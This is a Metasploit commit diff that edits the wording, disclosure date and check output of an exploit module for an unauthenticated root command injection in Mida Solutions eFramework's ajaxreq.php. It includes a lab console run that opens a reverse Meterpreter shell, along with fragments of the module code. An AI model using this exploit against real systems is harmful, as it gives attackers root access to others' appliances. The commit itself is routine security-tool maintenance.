resolve qa comments

rapid7 · Sep 11, 2020 · febe38e · febe38e
1 parent f5717e2
commit febe38e
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 13 deletions.
diff --git a/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md b/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
@@ -5,10 +5,10 @@ This module exploits a command injection vulnerability in
 version 2.9.0 and prior.
 
 The `ajaxreq.php` file allows unauthenticated users to inject
-arbitrary commands in the `PARAM` parameter to be executed as the
-apache user. This user is permitted to execute any command as root
-using sudo without providing a password, resulting in privileged
-command execution as root.
+arbitrary commands in the `PARAM` parameter to be executed as
+the apache user. The sudo configuration permits the apache user
+to execute any command as root without providing a password,
+resulting in privileged command execution as root.
 
 This module has been successfully tested on Mida Solutions
 eFramework-C7-2.9.0 virtual appliance.
@@ -40,14 +40,14 @@ msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
 rhosts => 172.16.191.123
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
-[+] 172.16.191.123:443 - The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+[+] 172.16.191.123:443 - The target is vulnerable.
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
 lhost => 172.16.191.165
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run
 
 [*] Started reverse TCP handler on 172.16.191.165:4444 
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+[+] The target is vulnerable.
 [*] Sending stage (3008420 bytes) to 172.16.191.123
 [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
 [*] Command Stager progress - 100.00% done (897/897 bytes)

diff --git a/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb b/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
@@ -20,10 +20,10 @@ def initialize(info = {})
           Solutions eFramework version 2.9.0 and prior.
 
           The `ajaxreq.php` file allows unauthenticated users to inject
-          arbitrary commands in the `PARAM` parameter to be executed as the
-          apache user. This user is permitted to execute any command as root
-          using sudo without providing a password, resulting in privileged
-          command execution as root.
+          arbitrary commands in the `PARAM` parameter to be executed as
+          the apache user. The sudo configuration permits the apache user
+          to execute any command as root without providing a password,
+          resulting in privileged command execution as root.
 
           This module has been successfully tested on Mida Solutions
           eFramework-C7-2.9.0 virtual appliance.
@@ -72,7 +72,7 @@ def initialize(info = {})
             ]
           ],
         'Privileged' => true,
-        'DisclosureDate' => '2020-08-27',
+        'DisclosureDate' => '2020-07-24',
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true
@@ -102,7 +102,7 @@ def check
       return CheckCode::Safe('Target is not vulnerable')
     end
 
-    CheckCode::Vulnerable(res.body)
+    CheckCode::Vulnerable
   end
 
   def execute_command(cmd, _opts = {})
@@ -118,7 +118,7 @@ def execute_command(cmd, _opts = {})
     }, 5)
 
     if res && !res.body.blank?
-      vprint_status("Command output: #{res.body.gsub(/<br>\z/, '')}")
+      vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")
     end
 
     res